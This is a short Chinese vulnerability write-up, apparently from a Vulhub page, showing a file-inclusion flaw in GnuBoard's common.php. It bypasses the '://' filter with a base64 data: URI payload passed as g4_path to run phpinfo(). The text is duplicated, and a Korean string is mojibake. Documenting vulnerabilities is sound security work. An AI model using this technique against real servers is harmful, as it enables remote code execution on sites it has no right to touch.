VULHUB ™

GnuBoard是韩国比较常见的一个论坛，存在较多的漏洞，其中common.php存在一个文件包含漏洞 看common.php代码 @extract($_GET); @extract($_POST); @extract($_SERVER); …… if (!$g4_path || preg_match("/:\/\//", $g4_path)) die("<meta http-equiv='content-type' content='text/html; charset=$g4[charset]'><script language='JavaScript'> alert('肋给等 规过栏肺 函荐啊 沥狼登菌嚼聪促.'); </script>"); //if (!$g4_path) $g4_path = "."; $g4['path'] = $g4_path; //只限制了$g4_path不能有字符 :// unset($g4_path); include_once("$g4[path]/lib/constant.php"); //本地文件包含漏洞 include_once("$g4[path]/config.php"); include_once("$g4[path]/lib/common.lib.php"); 远程代码执行漏洞 bypass_local.php <?php if (!$g4_path || preg_match("/:\/\//", $g4_path)) die("fuck"); $g4['path'] = $g4_path; unset($g4_path); include_once("$g4[path]/lib/constant.php"); ?> 在allow_url_include = On且PHP >= 5.2.0的条件下 提交bypass_local.php?g4_path=data:;base64,PD9waHBpbmZvKCk7Lyo= 成功执行phpinfo() GnuBoard 暂无

GnuBoard是韩国比较常见的一个论坛，存在较多的漏洞，其中common.php存在一个文件包含漏洞 看common.php代码 @extract($_GET); @extract($_POST); @extract($_SERVER); …… if (!$g4_path || preg_match("/:\/\//", $g4_path)) die("<meta http-equiv='content-type' content='text/html; charset=$g4[charset]'><script language='JavaScript'> alert('肋给等 规过栏肺 函荐啊 沥狼登菌嚼聪促.'); </script>"); //if (!$g4_path) $g4_path = "."; $g4['path'] = $g4_path; //只限制了$g4_path不能有字符 :// unset($g4_path); include_once("$g4[path]/lib/constant.php"); //本地文件包含漏洞 include_once("$g4[path]/config.php"); include_once("$g4[path]/lib/common.lib.php"); 远程代码执行漏洞 bypass_local.php <?php if (!$g4_path || preg_match("/:\/\//", $g4_path)) die("fuck"); $g4['path'] = $g4_path; unset($g4_path); include_once("$g4[path]/lib/constant.php"); ?> 在allow_url_include = On且PHP >= 5.2.0的条件下 提交bypass_local.php?g4_path=data:;base64,PD9waHBpbmZvKCk7Lyo= 成功执行phpinfo() GnuBoard 暂无